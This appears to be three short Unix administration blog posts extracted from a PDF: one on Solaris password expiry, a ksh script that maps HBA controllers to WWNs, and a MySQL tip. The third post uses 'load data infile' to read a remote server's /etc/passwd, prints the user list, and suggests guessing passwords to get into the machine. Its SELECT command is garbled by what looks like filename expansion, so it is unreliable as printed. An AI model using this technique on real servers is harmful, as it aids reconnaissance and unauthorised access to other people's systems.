Author: rdircio

Solaris password expiry explained with words

rdircio

If we check this “passwd -sa” output:
bash-3.00# passwd -sa | egrep ‘rdircio|root’
root PS
rdircio PS 12/21/09 14 56 14
It means that root’s password never expires since it doesn’t have any expiry rule. rdircio’s password was last
changed 12/21/09, the system won’t let me change it but 14 days after 12/21/09, it will expire and need be
changed 56 days after 12/21/09, i will be warned 14 days before it expires that i need to change it
44/433

get a table with HBA info without fcinfo

rdircio

We want a table that maps cX to its wwn and to its device path, like
ControllerWW port name
WW node name
Device Path
c1
p:210100e08b27e1 c7 n:200100e08b27e1 c7/pci@9,700000/pci@4/SUNW,qlc@4
So we wrote a script for it, hbainfo.ksh:
#!/bin/ksh
prtpicl -v -c scsi-fcp | egrep ‘ww|devfs’ | sed ‘s/:node-wwn//g; s/:port-wwn//g;s/:devfs-path//g; s/ //g’ | nawk
‘ORS=NR%3?” “:”n”‘ > /tmp/piclmap.$$
(for c in `cfgadm -al | grep “fc-” | awk ‘{ print $1 }’`;do
/usr/ucb/echo -n $c;
luxadm -e dump_map /dev/cfg/${c} | grep Adap |while read l;do
for w in `echo $l`;do
WC=`echo $w|wc -c`
if [ $WC -eq 17 ];then
/usr/ucb/echo -n ” $w ”
fi
done
echo “”
done
done
) | while read l;do
W=`echo $l |awk ‘{ print $2 }’`
L=`echo “$l ” | awk ‘{ print $1 ” p:” $2 ” n:”$3 }’`
/usr/ucb/echo -n “$L ”
grep $W /tmp/piclmap. $$ | awk ‘{ print $3 }’
done
rm /tmp/piclmap. $$
Thanks to Hiram Ruiz for the commands
133/433

mysql “load data infile”

rdircio

Say you want to know which users are in a remote server… and you have access to mysql on that server.
# mysql -h remote server;
mysql> show databases;
+————+
| Database |
+————+
| ixx |
| mysql |
| phpmyadmin |
| test |
| video |
| x10 |
| zm |
+————+
mysql > use ixx;
Database changed
mysql> show tables;
+—————-+
| Tables_in_issy |
+—————-+
| ccs |
| fss |
| p |
| prop |
+—————-+
4 rows in set (0.00 sec)
mysql> CREATE TABLE `p` ( `p` TEXT NOT NULL
) TYPE = MYISAM;
mysql> load data infile ‘/etc/passwd’ into table p;
mysql> select kraftek.html POSTS rescue rescued.html rescued.txt x y z from p;
+———————————————————–+
| p |
+———————————————————–+
| root:x:0:0::/root:/bin/bash |
| bin:x:1:1:bin: /bin: |
| daemon:x:2:2:daemon:/sbin: |
| adm:x:3:4:adm: /var/log: |
| lp:x:4:7:lp:/var/spool/lpd: |
| sync:x:5:0:sync:/sbin:/bin/sync |
| shutdown:x:6:0:shutdown:/sbin: /sbin/shutdown |
| halt:x:7:0:halt:/sbin:/sbin/halt |
129/433
| mail:x:8:12:mail:/: |
| news:x:9:13:news:/usr/lib/news: |
| uucp:x:10:14:uucp:/var/spool/uucppublic: |
| operator:x:11: 0:operator:/root:/bin/bash |
| games:x:12:100:games:/usr/games: |
| ftp:x:14:50::/home/ftp: |
| smmsp:x:25:25: smmsp:/var/spool/clientmqueue: |
| mysql:x:27:27: MySQL:/var/lib/mysql:/bin/bash |
| rpc:x:32:32:RPC portmap user:/:/bin/false |
| sshd:x:33:33:sshd:/: |
| gdm:x:42:42:GDM:/var/state/gdm:/bin/bash |
| pop:x:90:90:POP:/: |
| nobody:x:99:99:nobody:/: |
| apache:x:1000: 102::/home/apache:/bin/bash |
| iceuser:x:1001:104::/usr/local/icecast2: |
| vvb:x:1002:100::/home/vvb: |
| ixx:x:1003:100:invitado,1,58252323,:/home/ixx: /bin/bash |
| dvd:x:1004:100:Dvd,,,:/home/dvd:/bin/bash |
+———————————————————–+
26 rows in set (0.00 sec)
You maybe can guess a password for one of these users and get access to the box
130/433